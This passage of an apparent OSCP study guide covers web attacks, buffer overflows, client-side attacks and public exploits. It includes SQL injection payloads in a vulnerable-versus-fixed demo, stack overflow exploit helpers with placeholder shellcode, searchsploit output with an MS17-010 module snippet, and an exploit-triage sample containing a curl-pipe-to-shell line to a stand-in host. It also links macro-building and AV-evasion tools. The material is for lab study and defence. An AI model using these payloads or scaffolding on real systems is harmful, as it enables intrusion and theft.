  &lt;li&gt;Directory traversal. OWASP: &lt;a href=&quot;https://owasp.org/www-community/attacks/Path_Traversal&quot;&gt;https://owasp.org/www-community/attacks/Path_Traversal&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;File inclusion (LFI/RFI). Metasploit Unleashed: &lt;a href=&quot;https://www.offensive-security.com/metasploit-unleashed/file-inclusion-vulnerabilities/&quot;&gt;https://www.offensive-security.com/metasploit-unleashed/file-inclusion-vulnerabilities/&lt;/a&gt;; OWASP Testing for LFI: &lt;a href=&quot;https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion&quot;&gt;https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;SQL injection. OWASP: &lt;a href=&quot;https://www.owasp.org/index.php/SQL_Injection&quot;&gt;https://www.owasp.org/index.php/SQL_Injection&lt;/a&gt;; Pentest Monkey SQL injection cheat sheets: &lt;a href=&quot;http://pentestmonkey.net/category/cheat-sheet/sql-injection&quot;&gt;http://pentestmonkey.net/category/cheat-sheet/sql-injection&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;SQL Injection Tools: 
I would not recommend using these tools until you have a clear understanding of SQL databases and how a SQL injection works. The tools below make it easy to automate a SQL injection, but their more aggressive options can cause damage to a target’s database. Here is a list of tools I have played with to get a better understanding of how SQL injection can be automated:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;SQLmap: &lt;a href=&quot;https://github.com/sqlmapproject/sqlmap/wiki/Usage&quot;&gt;https://github.com/sqlmapproject/sqlmap/wiki/Usage&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;NoSQLMap: &lt;a href=&quot;https://github.com/codingo/NoSQLMap&quot;&gt;https://github.com/codingo/NoSQLMap&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
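
&lt;p&gt;Before reaching for sqlmap it is worth seeing the bug itself. The following is an added example (not from the original post) using Python’s built-in sqlite3 module: the vulnerable functions build SQL by string concatenation, so a username of &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;admin&apos;--&lt;/code&gt; comments out the password check and a UNION payload in a search box reads the users table; the safe versions use parameterized queries, where the same inputs are treated as data and match nothing. The schema, rows and payloads are constructed for the demo.&lt;/p&gt;

```python
"""SQL injection, vulnerable and fixed, against an in-memory SQLite DB (added example)."""
import sqlite3


def make_db():
    """Constructed demo schema: a users table and a products table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT)")
    db.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL)")
    db.executemany("INSERT INTO users (username, password, role) VALUES (?, ?, ?)",
                   [("admin", "S3cret!", "admin"), ("alice", "alice123", "user")])
    db.executemany("INSERT INTO products (name, price) VALUES (?, ?)",
                   [("Widget", 9.99), ("Gadget", 19.99)])
    return db


# --- vulnerable: user input is pasted into the SQL text ---------------------

def login_vulnerable(db, username, password):
    """Returns (username, role) on success. The quotes around the inputs are the
    only thing separating data from code, so a quote in the input breaks out."""
    sql = ("SELECT username, role FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return db.execute(sql).fetchone()


def search_vulnerable(db, term):
    """Product search; a UNION payload appends rows from any other table."""
    sql = "SELECT name, price FROM products WHERE name LIKE '%" + term + "%'"
    return db.execute(sql).fetchall()


# --- fixed: parameterized queries, the driver never treats input as SQL ------

def login_safe(db, username, password):
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone()


def search_safe(db, term):
    sql = "SELECT name, price FROM products WHERE name LIKE ?"
    return db.execute(sql, ("%" + term + "%",)).fetchall()


# Payloads a tester would try by hand before automating anything.
AUTH_BYPASS = "admin'--"     # closes the string and comments out the password check
TAUTOLOGY = "' OR 1=1--"     # true for every row, so the first user comes back
UNION_DUMP = "%' UNION SELECT username, password FROM users--"   # two columns, like the original query

if __name__ == "__main__":
    db = make_db()
    print("bypass   :", login_vulnerable(db, AUTH_BYPASS, "wrong"))
    print("tautology:", login_vulnerable(db, TAUTOLOGY, "wrong"))
    print("dump     :", search_vulnerable(db, UNION_DUMP))
    print("fixed    :", login_safe(db, AUTH_BYPASS, "wrong"), search_safe(db, UNION_DUMP))
```

The UNION payload only works because the attacker matched the column count of the original query (two); finding that count, and which columns are displayed, is exactly the manual step sqlmap automates, and it is also where a blind `ORDER BY` probe against a production database starts doing real work on the server.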

&lt;h4 id=&quot;hands-on-areas-to-improve-your-web-attack-skills&quot;&gt;Hands on areas to improve your web attack skills:&lt;/h4&gt;
&lt;ul&gt;
  &lt;li&gt;Metasploitable 2: contains vulnerable web applications such as &lt;a href=&quot;https://github.com/webpwnized/mutillidae&quot;&gt;Mutillidae&lt;/a&gt; and the &lt;a href=&quot;http://www.dvwa.co.uk/&quot;&gt;Damn Vulnerable Web App (DVWA)&lt;/a&gt; that you can use to improve your web skills.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Link to download the machine: &lt;a href=&quot;https://metasploit.help.rapid7.com/docs/metasploitable-2&quot;&gt;https://metasploit.help.rapid7.com/docs/metasploitable-2&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Backup Link: &lt;a href=&quot;https://www.vulnhub.com/entry/metasploitable-2,29/&quot;&gt;https://www.vulnhub.com/entry/metasploitable-2,29/&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;
    &lt;p&gt;Exploitability Guide: &lt;a href=&quot;https://metasploit.help.rapid7.com/docs/metasploitable-2-exploitability-guide&quot;&gt;https://metasploit.help.rapid7.com/docs/metasploitable-2-exploitability-guide&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;OWASP Juice Shop: Another vulnerable web application that contains a variety of challenges to improve your web skills. 
&lt;a href=&quot;https://www.owasp.org/index.php/OWASP_Juice_Shop_Project&quot;&gt;https://www.owasp.org/index.php/OWASP_Juice_Shop_Project&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;OverTheWire Natas: a set of web-based wargame challenges, each of which you must complete to get the password for the next level. I really enjoyed their challenges when I did them! 
&lt;a href=&quot;http://overthewire.org/wargames/natas/&quot;&gt;http://overthewire.org/wargames/natas/&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Web Security Academy: from PortSwigger, the makers of Burp Suite and authors of The Web Application Hacker’s Handbook. The site contains a variety of practical labs on web application attacks:
&lt;a href=&quot;https://portswigger.net/web-security&quot;&gt;https://portswigger.net/web-security&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Other resources: 
Hack This Site: &lt;a href=&quot;https://www.hackthissite.org/&quot;&gt;https://www.hackthissite.org/&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
&lt;/ul&gt;

&lt;h1 id=&quot;section-10-buffer-overflows-for-windows-and-linux&quot;&gt;Section 10: Buffer Overflows for Windows and Linux&lt;/h1&gt;

&lt;p&gt;My favorite section to learn about! The material provided in the PWK was fantastic and really straightforward. Across the internet you will find a variety of resources to help you understand how buffer overflows work. With that said, here are some of my notes and the resources that helped me understand how buffer overflows work.&lt;/p&gt;

&lt;p&gt;Corelan Team: a huge shout out to these guys, because their articles, from information security to exploit development, are absolutely incredible!
Their article series on stack-based overflows gave me a better understanding of how to identify and exploit a buffer overflow in an application:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Part 1: 
&lt;a href=&quot;https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/&quot;&gt;https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Part 2: 
&lt;a href=&quot;https://www.corelan.be/index.php/2009/07/23/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-2/&quot;&gt;https://www.corelan.be/index.php/2009/07/23/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-2/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Once I finished reading the articles I started going through write-ups and forums where people manually identified buffer overflows in certain applications. For these walkthroughs I used Exploit-DB to check whether it hosted the vulnerable application, which it did in many cases. I won’t provide any of the walkthroughs, but I will at least list the binaries you can use to practice manually identifying buffer overflows.&lt;/p&gt;
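
&lt;p&gt;The workflow those articles teach (crash the service with a long string, find the offset to EIP with a cyclic pattern, find the bad characters, then place a return address and shellcode) is easy to script. Here is an added example in Python, not the post’s own code and not an exploit for any particular binary: pattern_create() and pattern_offset() reproduce the Aa0Aa1… sequence that msf-pattern_create and msf-pattern_offset use, badchar_buffer() builds the 0x01 to 0xff probe, first_mangled() compares that probe with the bytes dumped from memory in the debugger, and build_payload() lays out the final buffer from an offset, a return address and shellcode. The return address and shellcode in the demo are placeholders, and send_buffer() is the only part that touches the network (for a lab target such as vulnserver).&lt;/p&gt;

```python
"""Stack overflow helpers: cyclic pattern, offset, bad chars, payload layout (added example)."""
import itertools
import socket
import string

PATTERN_SET = [a + b + c for a, b, c in
               itertools.product(string.ascii_uppercase, string.ascii_lowercase, string.digits)]


def pattern_create(length):
    """Aa0Aa1Aa2...: every 4-byte window is unique for 20280 bytes, like msf-pattern_create."""
    return "".join(itertools.islice(itertools.cycle(PATTERN_SET), length // 3 + 1))[:length]


def pattern_offset(pattern, eip):
    """eip: the value the debugger shows (int such as 0x386F4337, or the 4 characters).
    The register holds the bytes little-endian, so 0x386F4337 is the text '7Co8'."""
    if isinstance(eip, int):
        needle = eip.to_bytes(4, "little").decode("latin-1")
    elif isinstance(eip, (bytes, bytearray)):
        needle = eip.decode("latin-1")
    else:
        needle = eip
    return pattern.find(needle)


def badchar_buffer(exclude=(0x00,)):
    """All bytes 0x01..0xff except those already known to be bad; send it after the EIP overwrite."""
    skip = set(exclude)
    return bytes(b for b in range(256) if b not in skip)


def first_mangled(sent, dumped):
    """Compare the probe with the bytes dumped from memory; return the first byte that was
    changed or truncated (the next bad character), or None when every byte survived."""
    for index, byte in enumerate(sent):
        if index == len(dumped) or dumped[index] != byte:
            return byte
    return None


def build_payload(offset, return_address, shellcode, nop_sled=16, total=None):
    """[filler][EIP = return_address][NOP sled][shellcode][padding up to total]."""
    payload = b"A" * offset + return_address.to_bytes(4, "little") + b"\x90" * nop_sled + shellcode
    if total is not None:
        payload = payload + b"C" * max(0, total - len(payload))
    return payload


def send_buffer(host, port, data, banner=True, timeout=5):
    """Live helper for a lab target: optionally read the banner, send data, close."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        if banner:
            sock.recv(1024)
        sock.sendall(data)


if __name__ == "__main__":
    pattern = pattern_create(3000)
    # 0x386F4337 is the EIP value a 3000-byte pattern produces against vulnserver's TRUN command.
    print("offset for EIP 386F4337:", pattern_offset(pattern, 0x386F4337))
    probe = badchar_buffer()
    # Simulated memory dump in which the service truncated the buffer at the newline (0x0a).
    print("next bad char:", hex(first_mangled(probe, probe[:probe.index(0x0a)])))
    jmp_esp = 0x41414141                 # placeholder: use a jmp esp address from a module without ASLR
    placeholder_shellcode = b"\xcc" * 8  # INT3 breakpoints standing in for real shellcode
    print(len(build_payload(2003, jmp_esp, placeholder_shellcode, total=3000)), "bytes")
```

Run first_mangled() once per bad character: every time it reports one, add that byte to the exclude list, resend, and compare again, because the service may mangle several bytes and the dump only shows the first break.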

&lt;p&gt;Windows Binaries (I recommend running these on a 32-bit Windows 7 or XP VM):&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Vulnserver: &lt;a href=&quot;https://samsclass.info/127/proj/vuln-server.htm&quot;&gt;https://samsclass.info/127/proj/vuln-server.htm&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Minishare 1.4.1: &lt;a href=&quot;https://www.exploit-db.com/exploits/636&quot;&gt;https://www.exploit-db.com/exploits/636&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Savant Web Server 3.1: &lt;a href=&quot;https://www.exploit-db.com/exploits/10434&quot;&gt;https://www.exploit-db.com/exploits/10434&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Freefloat FTP Server 1.0: &lt;a href=&quot;https://www.exploit-db.com/exploits/40673&quot;&gt;https://www.exploit-db.com/exploits/40673&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Core FTP Server 1.2: &lt;a href=&quot;https://www.exploit-db.com/exploits/39480&quot;&gt;https://www.exploit-db.com/exploits/39480&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;WarFTP 1.65: &lt;a href=&quot;https://www.exploit-db.com/exploits/3570&quot;&gt;https://www.exploit-db.com/exploits/3570&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;VUPlayer 2.4.9: &lt;a href=&quot;https://www.exploit-db.com/exploits/40018&quot;&gt;https://www.exploit-db.com/exploits/40018&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Linux Binaries:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Linux Buffer Overflow: &lt;a href=&quot;https://samsclass.info/127/proj/lbuf1.htm&quot;&gt;https://samsclass.info/127/proj/lbuf1.htm&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Vulnerable Boxes:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Brainpan 1:  &lt;a href=&quot;https://www.vulnhub.com/entry/brainpan-1,51/&quot;&gt;https://www.vulnhub.com/entry/brainpan-1,51/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Pinky’s Palace version 1: &lt;a href=&quot;https://www.vulnhub.com/entry/pinkys-palace-v1,225/&quot;&gt;https://www.vulnhub.com/entry/pinkys-palace-v1,225/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Stack Overflows for Beginners: &lt;a href=&quot;https://www.vulnhub.com/entry/stack-overflows-for-beginners-101,290/&quot;&gt;https://www.vulnhub.com/entry/stack-overflows-for-beginners-101,290/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;SmashTheTux: &lt;a href=&quot;https://www.vulnhub.com/entry/smashthetux-101,138/&quot;&gt;https://www.vulnhub.com/entry/smashthetux-101,138/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Pandora’s Box: &lt;a href=&quot;https://www.vulnhub.com/entry/pandoras-box-1,111/&quot;&gt;https://www.vulnhub.com/entry/pandoras-box-1,111/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Other Resources:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Whitepaper Introduction to Immunity Debugger: &lt;a href=&quot;https://www.sans.org/reading-room/whitepapers/malicious/basic-reverse-engineering-immunity-debugger-36982&quot;&gt;https://www.sans.org/reading-room/whitepapers/malicious/basic-reverse-engineering-immunity-debugger-36982&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Do Stack Buffer Overflow Good: &lt;a href=&quot;https://github.com/justinsteven/dostackbufferoverflowgood&quot;&gt;https://github.com/justinsteven/dostackbufferoverflowgood&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Buffer Overflows for Dummies: &lt;a href=&quot;https://www.sans.org/reading-room/whitepapers/threats/buffer-overflows-dummies-481&quot;&gt;https://www.sans.org/reading-room/whitepapers/threats/buffer-overflows-dummies-481&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Vortex Stack Buffer Overflow Practice: &lt;a href=&quot;https://www.vortex.id.au/2017/05/pwkoscp-stack-buffer-overflow-practice/&quot;&gt;https://www.vortex.id.au/2017/05/pwkoscp-stack-buffer-overflow-practice/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Smashing the Stack For Fun and Profit: &lt;a href=&quot;http://www-inst.eecs.berkeley.edu/~cs161/fa08/papers/stack_smashing.pdf&quot;&gt;http://www-inst.eecs.berkeley.edu/~cs161/fa08/papers/stack_smashing.pdf&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Buffer Overflow Guide: &lt;a href=&quot;https://github.com/johnjhacking/Buffer-Overflow-Guide&quot;&gt;https://github.com/johnjhacking/Buffer-Overflow-Guide&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Stack based Linux Buffer Overflow: &lt;a href=&quot;https://www.exploit-db.com/docs/english/28475-linux-stack-based-buffer-overflows.pdf&quot;&gt;https://www.exploit-db.com/docs/english/28475-linux-stack-based-buffer-overflows.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h1 id=&quot;section-11-client-side-attacks&quot;&gt;Section 11: Client-Side Attacks&lt;/h1&gt;
&lt;p&gt;Client-side attacks usually require user interaction, so it’s good to understand how they work and how to set one up. For instance, check out the Client Side Attacks section in Metasploit Unleashed: &lt;a href=&quot;https://www.offensive-security.com/metasploit-unleashed/client-side-attacks/&quot;&gt;https://www.offensive-security.com/metasploit-unleashed/client-side-attacks/&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Social engineering is one of the most common tactics used to execute a client-side attack. The more information you gather while planning the attack, and the better the pretext you build from it, the better the chance that the target opens or clicks your payload. Here are some client-side attack vectors that are commonly used:&lt;/p&gt;

&lt;p&gt;HTML Applications:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Understanding HTA Attacks: &lt;a href=&quot;https://www.trustedsec.com/blog/malicious-htas/&quot;&gt;https://www.trustedsec.com/blog/malicious-htas/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Creating HTA Files with Empire: &lt;a href=&quot;https://dmcxblue.gitbook.io/red-team-notes/initial-acces/spear-phishing-links/tools&quot;&gt;https://dmcxblue.gitbook.io/red-team-notes/initial-acces/spear-phishing-links/tools&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Template for creating your own: &lt;a href=&quot;https://github.com/tjnull/OSCP-Stuff/blob/master/Client-Side-Attacks/Template.HTA&quot;&gt;https://github.com/tjnull/OSCP-Stuff/blob/master/Client-Side-Attacks/Template.HTA&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Tools to use for HTA Attacks:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Demiguise: &lt;a href=&quot;https://github.com/nccgroup/demiguise&quot;&gt;https://github.com/nccgroup/demiguise&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;WeirdHTA: &lt;a href=&quot;https://github.com/felamos/weirdhta&quot;&gt;https://github.com/felamos/weirdhta&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;SharpShooter: &lt;a href=&quot;https://github.com/mdsecactivebreach/SharpShooter&quot;&gt;https://github.com/mdsecactivebreach/SharpShooter&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Microsoft Office Macros (Maldoc):&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Malicious Macros: &lt;a href=&quot;https://www.trustedsec.com/blog/malicious-macros-for-script-kiddies/&quot;&gt;https://www.trustedsec.com/blog/malicious-macros-for-script-kiddies/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Creating your own Maldoc: &lt;a href=&quot;https://www.pentestpartners.com/security-blog/how-to-create-poisoned-office-documents-for-your-staff-awareness-training-part-1/&quot;&gt;https://www.pentestpartners.com/security-blog/how-to-create-poisoned-office-documents-for-your-staff-awareness-training-part-1/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Building Obfuscated Macros: &lt;a href=&quot;https://blog.focal-point.com/how-to-build-obfuscated-macros-for-your-next-social-engineering-campaign&quot;&gt;https://blog.focal-point.com/how-to-build-obfuscated-macros-for-your-next-social-engineering-campaign&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Tools to help you build your own Macros:&lt;/p&gt;

&lt;p&gt;Use these tools to learn how macros are built, then make your own. Be creative when you build your own macros: payloads generated straight from tools like these are well known and will be flagged by AV.&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;msfvenom VBScript infection methods (Metasploit Unleashed): &lt;a href=&quot;https://www.offensive-security.com/metasploit-unleashed/vbscript-infection-methods/&quot;&gt;https://www.offensive-security.com/metasploit-unleashed/vbscript-infection-methods/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Macropack: &lt;a href=&quot;https://github.com/sevagas/macro_pack&quot;&gt;https://github.com/sevagas/macro_pack&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;EvilClippy: &lt;a href=&quot;https://github.com/outflanknl/EvilClippy&quot;&gt;https://github.com/outflanknl/EvilClippy&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h1 id=&quot;section-12-handling-public-exploits&quot;&gt;Section 12: Handling Public Exploits&lt;/h1&gt;

&lt;p&gt;There will come a time when you need to use a public exploit on your target to see if you can obtain a shell on it. You may need to modify the shellcode, or other parts of the exploit, to match your attacking system and the target so that the connection comes back to you.
A word of advice: be careful with exploits you download from the public! They are written to endanger the target, but they can endanger your own machine just as easily. Review the source code and test the exploit in a contained environment (a VM or an isolated lab network) before running it on your actual system.&lt;/p&gt;

&lt;p&gt;Before you run a public exploit, take the time to read the code and understand what it is actually supposed to do. If you do not understand how the code works, do some research! You can almost always find proofs of concept and walkthroughs online that explain how the exploit works. Not all exploits work right out of the box: you will usually need to set the target address, and the callback host and port, so that the payload can reach your attacking system. If you do not review the code or make the necessary modifications, you run the risk that the exploit fails, crashes the target system or service, or leaves behind a listener that anyone else on the network can connect to.&lt;/p&gt;
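
&lt;p&gt;As an added example (not code from the original post), the following script does the first pass of that review mechanically: it pulls out of an exploit file the hard-coded hosts, ports and URLs that will have to be changed to point at your attacking system, the base64 or hex blobs that hide shellcode and must be decoded and inspected, and any commands the script would run on the machine it is executed from. It only reads the file; it never runs it. The regular expressions are deliberately loose (they will flag version numbers that look like IPs), and the exploit text at the bottom is constructed for the demo, not a real exploit.&lt;/p&gt;

```python
"""Static triage of a downloaded exploit before running it (added example)."""
import base64
import re

IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
URL = re.compile(r"https?://[^\s'\"]+")
CALLBACK = re.compile(r"\b(LHOST|LPORT|RHOST|RPORT|lhost|lport|rhost|rport)\b\s*=\s*['\"]?([^'\"\s,;)]+)")
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
HEX_BLOB = re.compile(r"(?:\\x[0-9a-fA-F]{2}){12,}")          # runs of \xNN, i.e. shellcode
LOCAL_EXEC = re.compile(r"\b(os\.system|subprocess\.\w+|os\.popen|eval|exec|system|popen|shell_exec|passthru)\s*\(")


def triage(source):
    """Return the items a reviewer must look at before running the exploit."""
    report = {
        "ips": sorted(set(IPV4.findall(source))),
        "urls": sorted(set(URL.findall(source))),
        "callbacks": {name.lower(): value for name, value in CALLBACK.findall(source)},
        "local_exec": sorted(set(LOCAL_EXEC.findall(source))),
        "hex_blob_bytes": sum(len(match) // 4 for match in HEX_BLOB.findall(source)),
        "decoded_blobs": [],
    }
    for blob in B64_BLOB.findall(source):
        try:
            decoded = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
        except ValueError:          # binascii.Error is a ValueError: not really base64
            continue
        report["decoded_blobs"].append(decoded.decode("ascii", "replace")[:60])
    return report


# Constructed exploit text for the demo; the product, addresses and blobs are invented.
SAMPLE_EXPLOIT = r'''#!/usr/bin/env python3
# Fictional "SuperFTP 1.0" buffer overflow PoC (constructed for this example)
import os, socket
RHOST = "10.10.10.50"
RPORT = 21
LHOST = "192.168.119.13"       # the original author's attacking IP, hard-coded
LPORT = 4444
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.13 LPORT=4444 -f python -b "\x00\x0a\x0d"
buf = b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b"
os.system("curl -s http://203.0.113.9/stage2.sh | sh")   # runs on the attacker's own box!
key = "Y3VybCBodHRwOi8vMjAzLjAuMTEzLjkvYmFja2Rvb3Iuc2ggfCBzaA=="
'''

if __name__ == "__main__":
    for key, value in triage(SAMPLE_EXPLOIT).items():
        print(f"{key}: {value}")
```

In the constructed sample every category fires: the LHOST/LPORT values are someone else’s and must become yours, the `\x`-encoded buffer is shellcode you did not generate and should replace with your own msfvenom output, and both the os.system() line and the base64 string turn out to fetch and run a script from a third-party host on your machine. Anything a script like this flags is something to read by hand, not a verdict.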

&lt;p&gt;Places to find exploits:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;https://www.exploit-db.com/&quot;&gt;https://www.exploit-db.com/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://packetstormsecurity.com/files/tags/exploit/&quot;&gt;https://packetstormsecurity.com/files/tags/exploit/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://www.securityfocus.com/&quot;&gt;https://www.securityfocus.com/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Tools for finding exploits:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Searchsploit: a command line search tool for Exploit-DB&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Command Examples:&lt;/p&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;searchsploit ms17-010&lt;/code&gt; lists every Exploit-DB entry that references MS17-010 (the search is case-insensitive):&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@kali:~# searchsploit ms17-010
--------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                     |  Path
                                                                                                   | (/usr/share/exploitdb/)
--------------------------------------------------------------------------------------------------- ----------------------------------------
Microsoft Windows - &apos;EternalRomance&apos;/&apos;EternalSynergy&apos;/&apos;EternalChampion&apos; SMB Remote Code Execution  | exploits/windows/remote/43970.rb
Microsoft Windows - SMB Remote Code Execution Scanner (MS17-010) (Metasploit)                      | exploits/windows/dos/41891.rb
Microsoft Windows Server 2008 R2 (x64) - &apos;SrvOs2FeaToNt&apos; SMB Remote Code Execution (MS17-010)      | exploits/windows_x86-64/remote/41987.py
Microsoft Windows Windows 7/2008 R2 - &apos;EternalBlue&apos; SMB Remote Code Execution (MS17-010)           | exploits/windows/remote/42031.py
Microsoft Windows Windows 7/8.1/2008 R2/2012 R2/2016 R2 - &apos;EternalBlue&apos; SMB Remote Code Execution  | exploits/windows/remote/42315.py
Microsoft Windows Windows 8/8.1/2012 R2 (x64) - &apos;EternalBlue&apos; SMB Remote Code Execution (MS17-010) | exploits/windows_x86-64/remote/42030.py
--------------------------------------------------------------------------------------------------- ----------------------------------------

Shellcodes: No Result

&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;searchsploit -x /usr/share/exploitdb/exploits/windows/remote/43970.rb&lt;/code&gt;: the -x switch lets you examine the exploit code, or the information about the exploit, without leaving the terminal. You can also feed Nmap XML output to Searchsploit with its --nmap switch so it looks for exploits matching the services Nmap identified on your target.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@kali:~# searchsploit -x /usr/share/exploitdb/exploits/windows/remote/43970.rb

Snippet of the exploit: 
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Windows XP systems that are not part of a domain default to treating all
# network logons as if they were Guest. This prevents SMB relay attacks from
# gaining administrative access to these systems. This setting can be found
# under:
#
#  Local Security Settings &amp;gt;
#   Local Policies &amp;gt;
#    Security Options &amp;gt;
#     Network Access: Sharing and security model for local accounts

class MetasploitModule &amp;lt; Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010
  include Msf::Exploit::Powershell
  include Msf::Exploit::EXE
  include Msf::Exploit::WbemExec
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(update_info(info,
      &apos;Name&apos;           =&amp;gt; &apos;MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution&apos;,
      &apos;Description&apos;    =&amp;gt; %q{
        This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where
        primitive. This will then be used to overwrite the connection session information with as an
        Administrator session. From there, the normal psexec payload code execution is done.

        Exploits a type confusion between Transaction and WriteAndX requests and a race condition in
        Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy
        exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a
        named pipe.
        
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Play with some of the other switches Searchsploit has, because they make it much easier to find exploits on your Kali box.&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Manual for Searchsploit: &lt;a href=&quot;https://www.exploit-db.com/searchsploit&quot;&gt;https://www.exploit-db.com/searchsploit&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h1 id=&quot;section-13-transferring-files-to-your-target&quot;&gt;Section 13: Transferring Files to your target:&lt;/h1&gt;
